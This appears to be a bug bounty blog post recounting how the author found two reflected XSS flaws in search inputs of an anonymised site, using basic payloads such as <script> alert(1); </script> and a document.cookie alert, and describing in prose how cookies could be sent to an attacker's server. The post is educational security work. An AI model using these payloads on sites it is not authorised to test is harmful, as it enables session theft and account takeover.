In part 2, I will be going over how I found my first real world vulnerabilities. If you haven’t read part 1, make sure to go check it out! Since I don’t want to disclose the site these bugs were found on, I will be referring to fictitious website www.victim.com.
I was a frequent visitor of www.victim.com, and they made changes to some of their features. I knew they had a bug bounty program so I decided to start poking around to see if I could find anything.
They had a few new search bars, and search bars are notorious for a common vulnerability called XSS. I’ll repost some of the information about XSS I posted on one of my other articles, “This SIMPLE trick will exploit image uploads — $2500 TikTok bug bounty.”:
Cross-site Scripting (XSS) is a security headache for all web application developers. In this type of vulnerability, attackers will somehow inject malicious JavaScript code, or “scripts,” into a benign web app. If the attacker can successfully embed the script, then the script will have access important user information. When a victim visits said web app, the malicious script can steal a user’s cookies or other account credentials. The traditional example of XSS is testing an input field and adding the following payload:
<script> alert(“TEST”); </script>
. If an alert box pops up saying “TEST,” then XSS is possible. The script could be replaced with a much more dangerous script that sends the visitor’s session document.cookie to the hacker. Many modern web frameworks have some sort of defense against easy-to-find XSS attacks, but hackers keep coming up with interesting ways to bypass these filters. Ismail Tasdelen has compiled a pretty awesome list of payloads to test for XSS on Github, and @XssPayloads consistently tweets out newly discovered payloads. (Source: me)
Now that some of the basics of XSS are covered, I’ll go into the vulnerabilities I found. To protect the anonymity of the site, I’ll be using Google’s XSS Game to show the results.
On the the first input I found, I decided to test the most basic XSS payload: <h1> test </h1>
. The reason I didn’t immediately try a <script>
tag was because websites can sometimes try to defend against <script>
tags but not <h1>
tags, since <h1>
tags aren’t malicious. However, once I knew the <h1> tag was rendering on HTML, then I knew the parsing wasn’t being done correctly.
The above doesn’t necessarily mean that the site is vulnerable yet, just that it isn’t properly sanitizing inputs. Rather, it is taking any user inputs and displaying them in the HTML. Next, I tried the most basic malicious payload: <script> alert(1); </script>
. Once again success! Now I knew that the site was vulnerable to an XSS attack. Since www.victim.com was an authenticated site, I then changed the payload of the alert to be the value of document.cookie
. Note: in website below, there are no cookies, so I just added the word cookies instead of document.cookie so it wouldn’t be blank.
It’s important to demonstrate why this attack is important. As you can see in the picture above, the link is generated. If you were to visit that link, then the alert would pop up immediately as the script is loaded. The same thing occurs on www.victim.com, even though www.victim.com has two-factor authentication. Instead of the <script>
popping an alert, the <script> could be load a more sophisticated piece of JavaScript that reads the logged-in user’s document.cookie
and then sends it to the attacker’s server. An attacker would be able to load in the stolen cookies and log in and perform actions as the user.
I found another new input field on a different page on www.victim.com. I repeated the same steps above. However, when I tried the standard <script> alert(1); </script>
, something unusual happened. The alert box did not pop up, but somehow the site started rendering some of the other URL parameters on the page along with source code of the HTML file.
Even though the initial script wasn’t technically doing something malicious, I realized that because the site was rendering a portion of the URL as straight HTML, it was maybe possible to replace that url to actually display what was going on. So I removed param2
from the URL and replaced it with a <script> alert(2); </script>
tag.
Same as previous impact.
These were simple vulnerabilities that took very little time to investigate with medium level severity. It still requires a victim user to click on these links, but since the domain of the website is legit, it’s easier to trick someone into clicking it. I was lucky to know that the website was launching feature updates to be able to find these first, but websites are constantly updating and having bugs.
If you have not checked out part 1 yet, make sure to go check it out! Hope you find this helpful!
Want to Connect?Please consider contacting me at [email protected] following me on Medium, buying me a coffee, following me on twitter, or connecting with me on LinkedIn!